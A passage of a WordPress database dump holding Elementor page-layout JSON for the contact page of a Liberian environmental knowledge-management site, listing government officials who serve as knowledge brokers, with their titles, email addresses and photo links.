t_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23071,3333,'_elementor_edit_mode','builder'),(23072,3333,'_elementor_template_type','wp-page'),(23073,3333,'_elementor_version','3.0.16'),(23074,3333,'_wp_page_template','default'),(23075,3333,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 